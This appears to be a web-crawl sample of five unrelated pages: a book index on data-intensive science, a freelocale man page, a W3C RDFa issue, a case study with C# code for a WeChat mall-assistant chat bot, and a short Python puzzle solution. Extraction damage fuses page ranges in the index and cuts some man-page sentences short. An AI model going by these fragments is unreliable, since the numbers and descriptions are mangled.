Internet. See also World Wide Web and astronomical investigation, 4043 interconnectedness of computers, 215 public nature, 211212 and rapid dissemination of environmental information, 1819, 48 role in cabled ocean observatories, 30, 31, 34, 36 role in ecological synthesis studies, 23 unifying data with literature, xxvxxvii INTERNIST-1 expert system, 67 invertebrate nervous systems, 8587 Isenberg, David, 211 IT. See information technology (IT) infrastructure J JISC (Joint Information Systems Committee), xv journal articles. See scientific papers Juan de Fuca Plate, 33 K Kapoor, Ashish, 86, 87 Karman dataset, 161 KEGG (Kyoto Encyclopedia of Genes and Genomes), 138 Kepler, Johannes, xi Kepler Conjecture, 180 Kepler workflow system, 140 Keplers Laws, xviii Kuhn, Thomas, 209 Kurzweil, Ray, 59 L Laboratory Information Management Systems (LIMS), xxii, 227 LabVIEW, xxiv Lancaster, James, 57 Language Integrated Query (LINQ), 133 Large Hadron Collider (LHC), xiii, xx, xxi, 147 Large Synoptic Survey Telescope (LSST), 40 Lawrence Livermore National Laboratory (LLNL), 154 LEAD workflows, 141 libraries, serials crisis, 193. See also digital data libraries; scientific papers licensing, open, 212 life sciences. See also Earth and environmental science; ecology; medical knowledge; ocean science application of semantic enhancement that integrates data with text, 148, 189, 190 computational vs. bioinformatics, xix creating machine-actionable representations of knowledge in scholarly literature, 194 developing data infrastructure, 117123 Entrez search engine, xxixxxx exponential increases in volume of data, 77, 117120, 218 growth and complexity of available data sources, 9293, 121122, 137 visualization in process algebra models, 99105 Life Under Your Feet program, 23, 47 Lind, James, 57 LINQ (Language Integrated Query), 133 Linux, xxiv LONI Pipeline workflow system, 140 246 INDEX M machine learning, 56, 83, 84, 85, 86, 9495 macroscope, 224 mapping. See also SensorMap; visualization brain circuitry, 7677 and Ocean Observatory Initiative, 33 terrestrial laser scan for snow distribution in Swiss Alps, 47 MapReduce, 7, 8, 133, 166, 171 Marine Metadata Interoperability (MMI) project, 148 markup, 150, 170, 182, 183, 186, 188 mashups, xxx, 22, 170171 MATLAB, xxi, xxiv, 25 Maxwells equations, xviii Mayo Clinic Health Advisory, 6263 medical knowledge. See also healthcare accuracy and efficiency of diagnoses, 6768 data integrity issue, 71 exponential rate increase, 5859, 92 information overload, 58, 9293 NxOpinion platform, 66, 67 and patient data clouds, 6263 translation to medical practice, 5764, 92, 93, 224 medical records in data-intensive healthcare systems, 9293 electronic, 9192, 93 issues in developing countries, 6569, 7172 need for scalable systems, 6667 paradigms of healthcare information, 96 patient de-identification, 65, 67, 71, 72 patient identification, 71 medications. See drugs Medicity, 62 MEDSEEK, 62 MESUR project, 196 meteorology. See weather science microscopes, computational, 84, 8789. See also electron microscopy, macroscope Microsoft and aggregation of data, 166 Amalga system, 62, 63 Azure platform, 133 Bing, xxvi Conference Management Tool (CMT), xxviii, xxix Dryad, 133, 166, 171 DryadLINQ, 133 HealthVault, 62, 63 and MapReduce tool, 133 SenseWeb project, 48, 49 SQL Server, 25, 48 Trident Scientific Workflow Workbench, 141 Word, article authoring add-in, 188 WorldWide Telescope, 4143, 44 Millennium Development Goals, U.N., 66 MMI (Marine Metadata Interoperability) project, 148 mobile phones. See cell phones modeling language-based approaches for biological systems, 99105 for prediction of phenomena-based environmental data, 48 unified approach to data-intensive healthcare, 9197 Moderate Resolution Imaging Spectroradiometer (MODIS), 18 Moglen, Eben, 212213 Moores Law, 59, 126 mountains, surface variability, 45, 4647 MSR Computational Microscope, 87, 88 multicore processors, 126127, 128, 129 Murray, Christopher, 65 Murray-Rust, Peter, 194 myExperiment project, 142143, 168, 197 myGrid project, 168 N NASA (National Aeronautics and Space Administration) and coming flood of ecological data, 23 Earth Observing System Data and Information System, 112, 113, 115 Global Change Master Directory, 150 Moderate Resolution Imaging Spectroradiometer, 18 National Center for Atmospheric Research (NCAR), xii, xiv National Center for Biotechnology Information, xxx, 118 National Climatic Data Center, 22 National Ecological Observatory Network, 23 247 National Human Genome Research Institute, 120121 National Institutes of Health (NIH), xxv National Library of Medicine (NLM), xxv, xxvii, xxviii, xxx National Science Foundation (NSF), xii, xv, xx, xxi, 32, 111, 198 natural language processing, 167, 169, 170, 189 Nature Network, 217 NCAR (National Center for Atmospheric Research), xii, xiv NEPTUNE program, xxi, 29, 32, 34 nervous system, 8389. See also brain NetCDF (Network Common Data Form), xxiii network effects, 212, 216 networks, and data deluge, 210215. See also Internet neurobiologists, new tools for, 8389 neurons, brain, 7881. See also nervous system NeuroTrace, 81 Newtons Laws of Motion, xviii NIH (National Institutes of Health), xxv Nijmegen Medical Centre, The Netherlands, 141 NLM (National Library of Medicine), xxv, xxvii, xxviii, xxx North American Carbon Program, 25 nowcasting, 4849 Noyes, Henry, 58 NSF (National Science Foundation), xii, xv, xx, xxi, 32, 111, 198 nucleotide sequencing, 117120 Nurse, Paul, 99 NxOpinion Knowledge Manager (NxKM), 66, 67, 68, 70, 71 O OAI (Open Archives Initiative), 194, 198 observatories. See telescopes; virtual observatory efforts Ocean Observatory Initiative (OOI), 3234 ocean science, 2738, 148 OECD (Organisation for Economic Cooperation and Development), 206207 OMB (U.S. Office of Management and Budget), 204205 ontologies, defined, 148. See also semantics OOI (Ocean Observatory Initiative), 3234 Open Archives Initiative (OAI), 194, 198 Open Geospatial Consortium, 24 open source software, 133, 140, 156, 212 OpenCyc, 167 OpenURL, 194 OpenWetWare, 217 oreChem project, 170171 Oregon State University, 32 OReilly, Tim, 216 out-of-core computing, 154 overlay journals, xxviixxviii OWL (Web Ontology Language), 167, 169, 197 P PageRank, Google algorithm, 116, 218 Pan-STARRS project, xiii, 9, 40, 141 papers. See scientific papers paradigm shifts, 209210. See also science paradigms parallel computing background, 125126 exploiting at individual node level, 134 exploiting in cloud computing, 132133 and multicore computers, 126127 programming challenges, 126129 ParaView, 158159 PDF files, 188, 193 peer-review process compared with wikis, xxviiixxix future, xxviiixxix, 115 Jim Grays view, xvii, xxvixxix pros and cons, xxviii, 111, 179, 193 Pegasus workflow system, 140 petascale databases, 89, 119, 161 physical sciences, need for coordinated semantic enhancement effort, 148, 189, 190191 Pipeline Pilot workflow system, 140 plate tectonics. See Juan de Fuca Plate pneumonia, in developing countries, 66 policies, for accessing and sharing data within and among nations, 201208 powers of ten, 237 Powerset service, 167 probabilistic graphical models, 87, 94 probabilistic similarity networks, 67, 68 process calculi, 99 professional societies, xxviii, 151 Project NEPTUNE, xxi, 29, 32, 34 248 INDEX provenance, xii, xxix, 156, 157, 158, 197. See also citation data in scholarly communication PubChem, xxx, 217 public. See citizen science public health, 66, 69, 71. See also healthcare publications. See scientific papers PubMed Central, xxv, xxvi, xxvii, xxviii, xxx, 185, 186 R RDF (Resource Description Framework), 167, 197 reference data collections, 181182 Reflect tool, EMBL Germany, 186 registration, as core function in scholarly communication, 195 remote sensing. See sensors research, reexamining structures, 111116 rewarding, as core function in scholarly communication, 195 Robertson Research Institute, 66 robotics, role in ocean research, 31, 32 rofecoxib (Vioxx), 61 Royal Society of Chemistry, 186 RSS format, 197, 198 S San Diego Supercomputer Center (SDSC), xiv Sanger Institute, 118, 120121 satellites role in astronomical investigations, 42 role in ecological synthesis studies, 23, 24 role in environmental applications, 13, 17, 18, 46, 148149 role in ocean science, 28, 31, 32 scaling in medical records systems, 66, 67 as network capability, 211, 213 processing vs. data considerations, 143, 154 scanning electron microscope (SEM), 79. See also electron microscopy SCEC (Southern California Earthquake Center) CyberShake project, 140, 143 schema, xiii, xxiii, xxix scholarly communication. See also digital data libraries; scientific papers availability of Web for furthering scientific collaboration, 216217 citation data, 25, 151, 178, 186, 187, 195196, 226 core functions, 195 creating machine-actionable representations of knowledge in scientific literature, 194195 ever-growing scale of scientific record, 179180, 182 impact of data-intensive science on scientific record, 177183 Jim Grays view of coming revolution, xxvxxvii, 198 linking documents to data, xxviiixxix, 181, 182, 186188, 190, 219, 224226 long-term trends in scientific research, 217219 machine-friendly, 193199 need for collaboration and peer relationships between domain scientists and computer scientists, 78, 35, 4551, 150, 228 origin of division between experimental data and creation of theories, xi tracking evolution and dynamics of scholarly assets, 195197 School Health Annual Report Programme (SHARP), 69 science. See astronomy; data-intensive science; Earth and environmental science; ocean science science of environmental applications, 1319 science paradigms. See also fourth paradigm first, empirical, xviii, 96, 223 second, theoretical, xviii, 96, 223 third, computational, xviiixix, 96, 177, 180, 223 fourth, eScience, xviii, xix, 96, 223 in healthcare information, 96 Jim Grays view, xviiixix scientific communication. See scholarly communication scientific computing. See also cloud computing; data-intensive science communication between computer scientists and domain scientists, 78, 35, 4551, 150, 228 new tools for neurobiologists, 8389 and parallel processing, 125129 and plethora of data, 56, 8, 9, 131135 249 scientific computing, continued process algebra models of biological systems, 99105 scientific papers. See also archiving; digital data libraries changes in publishing practices, xxviii, 183 creating machine-actionable representations, 194195 digital model vs. electronic model, 181 exponential growth in number, 58, 92 instantaneous translation, 61 linking to data, xxviiixxix, 181, 182, 186188, 190, 219, 224226 semantic enhancement, 186190 serials crisis in libraries, 193 as tip of data iceberg, xvii vs. scientific data, xii, xxviixxx, 185 scientific record, 177183 scientists. See citizen science; domain scientists; scientific computing SciScope, 24 Scripps Institution of Oceanography, 32 scurvy, 5758 second paradigm, xviii, 96, 223 Sedna workflow system, 140 SEEK (Science Environment for Ecological Knowledge), 148 Semantic Computing, 169 Semantic Web, 151, 167, 170, 171, 198 semantics applying tools to eScience, 147152 enhancing text to include data links, 186190 and interoperability, 150151, 167, 168, 188, 197 SenseWeb project, 48, 49 SensorMap, 49 sensors role in ecological synthesis studies, 2325 role in environmental science, 4551, 148, 224 role in ocean research, 3133 SensorScope, 49 SETI@Home project, xxiv sharing data, 65, 6971, 128, 202, 203204. See also collaboration Shirky, Clay, 215 Short Read Archive, 118, 119 Shotton, D., 186 simulation comparison to fourth paradigm, 177, 180, 210 need for new data analysis techniques, 161162 process algebra models of biological systems, 99105 singularity, medical, 5564 sky browsers, 41 Sloan Digital Sky Survey (SDSS), xx, 4041 sneakernet, 166 snowmelt runoff, as example of relationships between basic science and applications, 1418 software tools, need for more in science disciplines, xx, xxi, xxivxxv. See also dataintensive science; scientific computing; workflows solar-terrestrial physics, 148, 149 SourceForge, 188 Southern California Earthquake Center (SCEC) CyberShake project, 140, 143 SQL Server, 25, 48 stationarity, 14, 16 Stefaner, Moritz, 226 Stoermer, Mark, 29, 36 Suber, Peter, xxv surface parameterization, 159160 Sustainable Digital Data Preservation and Access Network Partners (DataNet) program, 198 Swiss Alps, terrestrial laser scan for snow distribution, 46, 47 Swiss Experiment, 47, 4849 synthesis studies, ecology, 2126 Szalay, Alex, 235 T Taverna workflows, 138, 139, 140, 141 Taylor, John, 227 telescopes, 39, 40, 41. See also WorldWide Telescope (WWT) Teradata, 7 text. See also scientific papers role as type of data, 185191 semantic enhancement, 186190 tools for mining, 141, 182, 186, 189, 219 third paradigm, xviiixix, 96, 177, 180, 223 250 INDEX Trace/Trace Assembly Archive, 118, 119 transactional memory (TM), 128 Triana workflow system, 140 True Knowledge service, 167 U UFAC algorithm, 160 UniProt, 138 United Nations Millennium Development Goals, 66 University of California, San Diego, xiv, 32 URIs (uniform resource identifiers), 197 U.S. Geological Survey (USGS), 22, 23 U.S. Office of Management and Budget (OMB), 204205 USA National Phenology Network, 23 V Van Arkel, Hanny, 41 Vertica, 7 Very Large Array (VLA) radio telescope, 41 virtual observatory efforts, 43, 149 virtualization. See cloud computing VisTrails, 156, 157, 159 visual data analysis, 153163 visualization. See also imaging techniques common challenges across scientific fields, 4344 computational microscope for neurobiologists, 8389 needs and opportunities in data-intensive science, 153163 in process algebra models of biological systems, 99105 SensorMap example for displaying real-time and historical environmental factors, 49 in synthesis studies for ecological data, 26 ViSUS, 154155 VLA (Very Large Array) radio telescope, 41 von Neumann, John, 177 VSTO (Virtual Solar-Terrestrial Observatory), 149 W Wagenaar, Daniel, 86, 87 water systems. See snowmelt runoff, as example of relationships between basic science and applications WATERS Network, 23 Watson, Thomas, 215 weather science, 17, 46, 4849 Web 2.0, 216. See also World Wide Web Web Ontology Language (OWL), 167, 169, 197 Wellcome Trust, xxv, 118 Wikipedia, 212, 217 wikis, compared with peer review, xxviiixxix Wilbanks, John, 190 Wing, Jeannette, xx Wolfram|Alpha service, 167, 168, 189 Woods Hole Oceanographic Institution, 32 workflows as computer-enabled support activity for ocean science, 31 defined, 138 impact on data-centric research, 137145 and provenance, 156, 197 role in myGrid and myExperiment projects, 168 visually representing modifications, 157159 World Wide Web background, 134 as dominant computing platform, 216 impact on scientific research, 134, 166 and knowledge-driven research infrastructure, 167169 Web 2.0, 216217 WorldWide Telescope (WWT), 4, 4143, 44 XY X PRIZE for Genomics, xiii XML (eXtensible Markup Language), 122, 150, 186, 197 Yahoo!, 133, 166, 185 251 page x : Galileo calculates the magnification of his telescope. Mary Evans/Photo Researchers, Inc. Rights reserved. page x v i : page 222 : Two stars orbit one another in the core of the large emission nebula NGC 6357 in Scorpius, about 8,000 light-years from Earth. NASA, ESA, and Jess Maz Apellniz (Instituto de Astrofsica de Andaluca, Spain). Public domain. Jim Gray speaking at the Computing in the 21st Century conference in Beijing, October 2006. Microsoft Research. USGS/NASA image of the Bogda Mountains, China. U.S. Geological Survey. Public domain. page 2 : Visualization showing the citation links of the journal Nature. Image courtesy of Moritz Stefaner and Carl Bergstrom,. page 229 : Tony Hey, Kristin Tolle, and Stewart Tansley of Microsoft External Research. Vetala Hawkins/Microsoft Corporation. page 234 : Jim Gray on Tenacious, January 2006. Photo by Tony Hey. back cov er : Microsoft Tag from. Get the free app for your phone at and snap it! page 226 : page 54 : Colored magnetic resonance imaging (MRI) scan of a woman. Simon Fraser/Photo Researchers, Inc. Rights reserved. page 108 : A wafer containing the Intel Teraflops Research Chip. Intel Corporation. Rights reserved. page 174 : Central Library, Seattle (Rem Koolhaas, principal architect). Vetala Hawkins/Filmateria Digital. Rights reserved. not e : URLs can go offline for various reasons, either temporarily or permanently. Not all of the URLs in this book were still live at the time of publication, but we have successfully accessed such pages using various services such as Internet Archives Wayback Machine,. 252 The impact of Jim Grays thinking is continuing to get people to think in a new way about how data and software are redefining what it means to do science. Bill Gates I often tell people working in eScience that they arent in this field because they are visionaries or super-intelligentitsone
https://www.scribd.com/document/134036381/4th-Paradigm-Book-Complete
CC-MAIN-2019-35
en
refinedweb
freelocale - free resources allocated for a locale object #include <locale.h> void freelocale(locale_t locobj); The freelocale() function causes. No errors are defined. See attributes(7) for descriptions of the following attributes: duplocale(3C), newlocale(3C), uselocale(3C), attributes(7), standards(7)
https://docs.oracle.com/cd/E88353_01/html/E37843/freelocale-3c.html
CC-MAIN-2019-35
en
refinedweb
ISSUE-82: Can RDFa attributes be namespaced? rdfa attribute namespace Can RDFa attributes be namespaced? - State: - CLOSED - Product: - LC Comment - RDFa Core 1.1 - Raised by: - Steven Pemberton - Opened on: - 2011-02-03 - Description: - During a discussion about RDFa Host Language Conformance, the question arose on whether or not RDFa attributes were allowed to be used in namespace-aware XML languages: The RDFa Working Group needs to decide if RDFa can be integrated into other languages in a namespaced fashion. It was suggested that this could be an optional feature of RDFa Processors after noting that making it a mandatory feature would complicate RDFa Processor implementations more than desired. - Related Actions Items: - No related actions - Related emails: - RDFa WG telecon minutes for 2011-03-24 (from msporny@digitalbazaar.com on 2011-03-24) - Re: RDFa Last Call responses (from Steven.Pemberton@cwi.nl on 2011-03-09) - RDFa Last Call responses (from msporny@digitalbazaar.com on 2011-03-08) - RDFa WG telecon minutes for 2011-02-14 (from msporny@digitalbazaar.com on 2011-02-14) - Re: URGENT: RDFa Super Session II: The Last Calling (from shane@aptest.com on 2011-02-14) - Re: URGENT: RDFa Super Session II: The Last Calling (from ivan@w3.org on 2011-02-14) - URGENT: RDFa Super Session II: The Last Calling (from msporny@digitalbazaar.com on 2011-02-14) - Re: Telecon Agenda - February 10th 2011, 1400 UTC (from benjamin.adrian@dfki.de on 2011-02-10) - Telecon Agenda - February 10th 2011, 1400 UTC (from msporny@digitalbazaar.com on 2011-02-07) - ISSUE-82: Can RDFa attributes be namespaced? (from sysbot+tracker@w3.org on 2011-02-03) Related notes: Note that XHTML Modularization says the following about XHTML attributes:. The spec has been updated to reflect the resolution from the 14 February meeting.Shane McCarron, 2 Mar 2011, 04:43:29 Display change log
http://www.w3.org/2010/02/rdfa/track/issues/82?changelog
CC-MAIN-2019-35
en
refinedweb
Building a chat bot shopping assistant for Super Brand Mall's WeChat Nowadays physical malls and stores are facing unprecedented competition from e-commerce. Providing a differentiated in-store experience, knowing their customers better, and increasing customer stickiness are the topmost challenges for mall operators. Super Brand Mall, one of the high-end luxury shopping malls in Shanghai, partnered with Microsoft and built a chat bot for its WeChat official account. As a result, Super Brand Mall customers could get information about mall services through a conversational experience, making the bot a key component for this retail giant in remolding its customer experience. Key technologies used - Microsoft Bot Framework - Language Understanding Intelligent Service (LUIS) - Microsoft Azure SQL Database Core team The team was comprised of members from Super Brand Mall’s IT department and Microsoft DX China: - Christina Cheng – Director, IT Core Applications, Super Brand Mall - Junkai Zhang – Supervisor, IT, Super Brand Mall - Biyan Huang – Manager, IT, Super Brand Mall - Warren Zhou – Senior Technical Evangelist, Microsoft China - Leon Liang – Senior Technical Evangelist, Microsoft China - Zepeng She – Technical Evangelist, Microsoft China Figure 1. The team on a conversation-as-a-platform hackfest in China Customer profile Super Brand Mall is an international style urban shopping center developed by Shanghai Kinghill Limited, the real estate subsidiary of the Charoen Pokphand Group (CP Group) of Thailand. Super Brand Mall has a combined gross floor area of 250,000 square meters, with 10 floors above ground and 3 floors underground. Super Brand Mall is one of the CP Group’s flagship projects in China. Located in the Lujiazui area of Pudong, the most important financial district of the city, Super Brand Mall lies in the heart of The Bund. The overall architecture design was by the famous architect firm Jerde Partnership. With five different building elevations, its design, along with colors, makes Super Brand Mall a grand sight within the already exceptional Lujiazui area. Based on the motto “all aged customers, all day shopping experience, one-place satisfaction,” Super Brand Mall strives to meet modern home entertainment and shopping needs to break the general large commercial building layout mode, with a whole new concept in indoor commercial pedestrian street patterns. The design allows for internal and external consumer traffic, thus adding towards the already outstanding layout of the total structure. Problem statement Even though Super Brand Mall is one of the prime shopping malls in Shanghai, it lacks an effective way to digitally interact with its customers. The mall operates an official account on WeChat, the primary social and messaging app in China, and has more than 260,000 subscribers. However, it remains a one-way marketing advertisement platform rather than a communication interface. The mall is looking for a way to distinguish active members from ordinary visitors and profile their activities, interests, and preferences. Currently the only places that provide in-mall guidance are via some touch-screen directories and information desks, which do not meet the needs of all the customers all the time. Some isolated systems provide mall services such as promotional information and coupons, membership and points, and parking and payment. Customers want a unified interface to access these services in a way they prefer. “Before starting this intelligent chat bot project, we do not have a comprehensive and accurate way to record our customers’ asks: what are their queries, suggestions or complaints; which brands and promotion coupons they are interested; which services in the mall they really use. Without precisely knowing and profiling our customers, we could never transform ourselves to a better mall they enjoy and love!” —Christina Cheng, Director, IT Core Applications, Super Brand Mall Solution and steps Super Brand Mall considers WeChat to be its most important channel for digital marketing and customer engagement, so the chat bot is expected to be a key part of its WeChat official account. The bot is hosted on Microsoft Azure services. Leveraging Microsoft’s intelligent services (LUIS), the bot would understand users’ natural language inputs in Chinese, make queries to some data systems if needed, and reply to users with the following capabilities: - Querying the location and promotion information for brands and stores in the mall - Recommending brands and stores for categories - Querying in-mall events - Checking and consuming membership points - Querying the location and price for the parking lot To meet the requirements for the Super Brand Mall’s chat bot, the following technologies were adopted: - The chat bot starts from the Bot Builder SDK for .NET. Its conversational logic is written in C#. During the project period, WeChat was not yet an officially supported channel, so the bot communicates with WeChat via Direct Line 3.0 REST APIs. - To understand users’ inputs in Chinese natural language, the Microsoft Cognitive Services Language Understanding Intelligent Service (LUIS) was used to extract their intents and variables. - The chat bot needs some data from the mall’s line-of-business (LOB) systems to provide assistance for in-mall events, promotional campaigns, and membership information. Rather than accessing those heterogeneous LOB data sources directly, the bot accesses the easy-to-manage Azure SQL Database to retrieve the necessary data. Periodic synchronization to the LOB databases ensures that the information from the bot is up to date. Architecture diagram Figure 2 shows the architecture of this chat bot project: The bot is implemented in C# and deployed as a web app using Azure App Service on Azure datacenters in China. Texts and clicks to hyperlinks are the only interactions supported in this version, so LUIS is the only Cognitive Services feature invoked at present. Speech recognition using the Bing Speech API is in the plan for later. Azure SQL Database is a periodically synchronized copy of part of the LOB databases and is read by the bot. Later it will also store user preferences and activities extracted from chat history. Figure 2. Architecture diagram Demo video Technical delivery Prerequisite steps The following resources are prerequisite steps for the development environment: - Install Visual Studio. - Install the Bot Builder SDK for .NET. - Obtain Cognitive Services keys for LUIS. - Create an Azure account. Bot design and configuration Because the chat bot interacts with users in the WeChat mobile app on iOS, Android, and Windows phones, the design of the chat bot basically follows the bots in native mobile app pattern. As mentioned earlier, communicating to the WeChat backend requires enabling the Direct Line channel for this bot. To get the full capability and best performance, ensure that all three version options on the Direct Line configuration page are checked. Figure 3. Direct Line configuration Language Understanding Intelligent Service (LUIS) Intents Before doing a deep-dive into the bot code, let’s have a quick glance at the LUIS app to see how it helps us understand users’ intents in a mall-assistant scenario. Of the 18 intents defined in the LUIS app, some are frequently asked and quite complex with many utterances, such as ProvideInfo (86 utterances), QueryMemberStore (44), and QueryLocation (41), while some are less popular and simpler with fewer utterances, such as QueryParkingLot (7), SayHello (4), and SeeMovie (3). Figure 4. All intents For example, for the QueryMemberStore intent, the training utterances cover not only sayings such as “Which stores are members?” but also sayings with some constraints such as Category, Product, and Floor. In the real world, querying member stores for men’s clothes or down jackets are common questions. Figure 5. The QueryMemberStore intent Entities Entities are the parameters in the utterances that the scenario cares about. In addition to prebuilt entities such as datetime or number, seven custom entities are defined in this LUIS app: - Category - Brand - Product - Facility - Landmark - Floor - Activity Figure 6. All entities Phrase lists After designing the intents and entities, the trained LUIS model did not provide satisfying accuracy for later tests. Deeper investigation showed it performed poorly when recognizing some specific entities such as brand, event, and landmark names or their abbreviations. So the phrase list feature was adopted in the LUIS app by providing all possible entity values related to this mall. The refined and retrained LUIS app performs much better after importing these phrase lists. The learning here is, if there are very specific and uncommon words for your entities, be sure to use the phrase list or other features. Figure 7. All phrase lists Bot code samples MessagesController Following is the code for MessagesController. If there’s a message from the Direct Line channel, it invokes the CRMDialog4WeChat with parameters of the user’s WeChat ID. Although WeChat is the only channel at present that the bot responds to, the code keeps the extensibility to support other channels in the future. public class MessagesController : ApiController { public virtual async Task<HttpResponseMessage> Post([FromBody] Activity activity) { if (activity.Type == ActivityTypes.Message) { try { //可以通过ChannelId判断是哪个渠道。不同渠道的返回值可能并不相同,区分之后可以分别回复。 if ("directline".Equals(activity.ChannelId)) { //微信使用的是DirectLine接入方式,调用api的时候可以将参数加在里面。本项目将微信的微信名作为参数到本地接收。 await Conversation.SendAsync(activity, () => new CRMDialog4WeChat(activity.From.Id)); } else { await Conversation.SendAsync(activity, () => new CRMDialog(activity.From.Id)); } } catch (Exception e) { ConnectorClient connector = new ConnectorClient(new Uri(activity.ServiceUrl)); // calculate something for us to return int length = (activity.Text ?? string.Empty).Length; // return our reply to the user Activity reply = activity.CreateReply($"You sent {activity.Text} which was {length} characters" + " error :" + e.ToString()); //await connector.Conversations.ReplyToActivityAsync(reply); } } else { //add code to handle errors, or non-messaging activities } return new HttpResponseMessage(System.Net.HttpStatusCode.Accepted); } } CRMInfo The CRMInfo class defines the data object that stores a user’s dialog info and the last recognized intent and entity from LUIS. The reason why the bot does not use the intent and entity only for the current user input is that it needs to be context-aware. In some cases, one intent may last for several inputs. For example, the user question “Any recommendations for Thai food?” may easily be analyzed by LUIS with the intent “HaveMeal” and the entity “Thai food.” But when there follows “How about the Western food?”, LUIS may probably return no intent but the entity “Western food.” In this case, the last intent is referred to for the second input. public class CRMInfo { //顾客编号 public string customer { get; set; } //返回信息 public string replyString { get; set; } //目的 public string intent { get; set; } //品牌 public string brandText { get; set; } //业态 public string businessFormatText { get; set; } //楼层 public string floorText { get; set; } //单品 public string productText { get; set; } //基础信息 public string basicInfoText { get; set; } //活动 public string activityText { get; set; } //特约商户标志 private bool vipFlag = false; } CRMDialog4WeChat The CRMDialog4WeChat class handles intents and invokes the supporting services in CRMService4Wechat to assemble the bot’s reply message ( CRMInfo::replyString) to the user. Let’s take the QueryLocation intent as an example. When such an intent is passed from LUIS, it calls JudgeBrand1() to do a query for a certain brand. public class CRMDialog4WeChat { private CRMService4WeChat crmservice = new CRMService4WeChat(); //Intent: QueryLocation [LuisIntent("查询地点")] public async Task QueryLocation(IDialogContext context, LuisResult result) { //获取用户会话 CRMInfo info = crmservice.GetCustomerSession(TestCustomer); info.intent = "查询地点"; info.VipFlag = false; //设置通用信息 crmservice.SetCommonInfo(info, context, result); if (crmservice.JudgeBrand1(info)) { await context.PostAsync(info.replyString); //清空数据 crmservice.ClearData(info, false); } context.Wait(MessageReceived); } } CRMService4WeChat The bot’s dialog logic is expressed by the following functions: JudgeBrand1()in CRMService4WeChatis a dispatch function. - If there’s an effective brand entity string from LUIS, it calls JudgeBrand2()to assemble the reply for the brand’s location. - If the entity returned by LUIS is not a brand but a facility or landmark in the mall, it calls JudgeBasicInfo2(). In addition to providing the location information for a certain brand, the JudgeBrand2() function also: - Checks the category (or business format code) of this brand. - Tries to find related promotional information in the mall’s operations database (replaced by two hardcoded samples). - Replies to the user with quick hyperlinks. public class CRMService4WeChat { //判断品牌1 public bool JudgeBrand1(CRMInfo info) { //判断开始 if (!String.IsNullOrWhiteSpace(info.brandText)) { JudgeBrand2(info); } else if (!String.IsNullOrWhiteSpace(info.basicInfoText)) { JudgeBasicInfo2(info); } else { info.带我去</a>!"); sb.Append("<a href=\"星巴克&location=1\">优先排队</a>!"); sb.Append("<a href=\"\">领取优惠券</a>!"); sb.Append("\u0002"); sb.Append("现在星巴克有满100减20的活动,"); sb.Append("<a href=\"\">点我报名</a>可以折上折哦!"); sb.Append("\u0002"); sb.Append("您的优惠券:<a href=\"\">我的卡券</a>\n"); sb.Append("<a href=\"\">星巴克中杯咖啡券</a>\n"); sb.Append("<a href=\"\">星巴克买二送一</a>"); } else if ("小南国".Equals(BaseInfo.wordDic[brand.brand].name)) { sb.Append("\u0001小南国在这里"); sb.Append("\u0001点击查看小南国详情"); sb.Append("\u0001").Append(baseUrl).Append("/images/1F.png"); sb.Append("\u0001").Append(baseUrl).Append("/index2.html"); sb.Append("\u0001小南国品牌导购"); sb.Append("\u0001点击查看小南国详情"); sb.Append("\u0001").Append(baseUrl).Append("/images/xngdg.jpg"); sb.Append("\u0001"); sb.Append("\u0001小南国优惠券"); sb.Append("\u0001点击查看小南国详情"); sb.Append("\u0001").Append(baseUrl).Append("/images/xngyhq.jpg"); sb.Append("\u0001"); sb.Append("\u0001优先排队周末小南国满100减20,点我查看详总而言之言而总之,可以巴拉巴拉写很多很酷炫很吸引人的话放在这里,然后边上配上一张夺人眼球的图片!最多可以放8"); } break; } else if ("27".Equals(bb.businessformat_word_code) || "34".Equals(bb.businessformat_word_code)) { sb.Append("(可以接入虚拟试衣,领取优惠券等第三方服务)!"); break; } } info.replyString = sb.ToString(); } else { info.replyString = "对不起,您说的品牌" + info.brandText + "正大君没查询到哦。"; } return !String.IsNullOrWhiteSpace(info.replyString); } //判断基础信息2 public bool JudgeBasicInfo2(CRMInfo info) { //查询基础信息 t_basic_info basic_info = searchService.getBasicInfoByName(info.basicInfoText); if (null != basic_info) { StringBuilder sb = new StringBuilder(); sb.Append(basic_info.remark); info.replyString = sb.ToString(); } else { info.replyString = "对不起,您说的基础信息" + info.basicInfoText + "正大君没查询到哦。"; } return !String.IsNullOrWhiteSpace(info.replyString); } } Supporting functions, such as those as shown in the CRMService4WeChat code, process the intents and entities according to the dialog logic designed by the mall, and assemble and store the responses in the replyString in the CRMInfo object reference. The intent handling code in CRMDialog4WeChat posts the assembled replyString to the channel asynchronously, extending the intent handling entrances and the response generating functions until all the dialog logic is covered. Conclusion With Microsoft’s platform and partnership, Super Brand Mall in Shanghai published the first customer-facing chat bot for high-end shopping malls. Within only two months, the bot went from ideation to testing. The bot would bring more confidence to Super Brand Mall to engage its customers digitally and effectively. “With the help from Microsoft DX team, we have successfully trained an effective LUIS model and developed an intelligent chat bot that could answer most of the Frequently-Asked-Questions from our customers within such a short period. We really appreciate DX’s support. We are scheduling a launch of this bot in the coming months. We believe this bot would surely ignite our WeChat subscribers, provide amazing engagement experience and help us know our customers better.” —Christina Cheng, Director, IT Core Applications, Super Brand Mall Future work Many WeChat users prefer using voice rather than typing text. A chat bot that supports voice input would provide a better experience to these WeChat users. Using the Bing Speech API in Cognitive Services to do the speech recognition is definitely on top of Super Brand Mall’s to-do list. The conversations between the customers and the chat bot contain valuable data that the mall will never ignore. As one of the tasks on the list, customer preferences, interests, and activities would be extracted from the chat history and saved to Azure Storage for future machine learning and user profiling.
https://microsoft.github.io/techcasestudies/bot%20framework/2017/06/21/CaaP-SuperBrandMall.html
CC-MAIN-2021-39
en
refinedweb
Concise algorithm solution in Speedy category for Between Markers (simplified) by Igor_Sekretarev def between_markers(text: str, begin: str, end: str) -> str: i = 0 while text[i] != begin: i += 1 j = len(text)-1 while text[j] != end: j -= 1 return text[i+1:j] if __name__ == '__main__': print('Example:') print(between_markers('What is >apple<', '>', '<')) # These "asserts" are used for self-checking and not for testing assert between_markers('What is >apple<', '>', '<') == "apple" assert between_markers('What is [apple]', '[', ']') == "apple" assert between_markers('What is ><', '>', '<') == "" assert between_markers('>apple<', '>', '<') == "apple" print('Wow, you are doing pretty good. Time to check it!') April 23, 2021 Forum Price Global Activity ClassRoom Manager Leaderboard Coding games Python programming for beginners
https://py.checkio.org/mission/between-markers-simplified/publications/Igor_Sekretarev/python-3/concise-algorithm/share/60c9af148a8421d7a90976c7b6e1d77b/
CC-MAIN-2021-39
en
refinedweb
